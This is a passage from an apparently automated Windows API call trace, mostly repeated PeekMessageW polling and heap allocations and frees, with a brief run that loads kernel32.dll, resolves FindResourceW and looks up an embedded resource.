hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.626] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.627] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.627] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.627] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.629] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.629] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.629] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.629] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.629] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.630] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0119.630] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0119.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x14bd748 [0119.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x14bd748, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindResourceW", lpUsedDefaultChar=0x0) returned 14 [0119.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd748 | out: hHeap=0x12c0000) returned 1 [0119.631] GetProcAddress (hModule=0x74650000, lpProcName="FindResourceW") returned 0x74672a40 [0119.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0119.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff078 [0119.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6d0 [0119.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20002) returned 0x1303e48 [0119.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0119.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0119.632] FindResourceW (hModule=0x0, lpName="AppXDeploymentExtensions.desktop1", lpType=0x8) returned 0xfe7688 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0119.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0119.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0119.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd718 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0119.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0119.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd760 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0119.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x50) returned 0x1490ba0 [0119.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303e48 | out: hHeap=0x12c0000) returned 1 [0119.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0119.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0119.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0119.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0119.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0119.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0119.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0119.634] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0119.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3148 | out: hHeap=0x12c0000) returned 1 [0119.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1490ba0 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.636] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2f8 [0119.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2f8 | out: hHeap=0x12c0000) returned 1 [0119.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0119.637] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.637] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff370 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0119.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300d20 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0119.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0119.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.637] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0119.638] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0119.638] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef790 [0119.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0119.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0119.638] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0119.638] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0119.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0119.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0119.639] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0119.639] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0119.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0119.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e98 [0119.639] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e98 | out: hHeap=0x12c0000) returned 1 [0119.640] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.640] HeapFree (in: 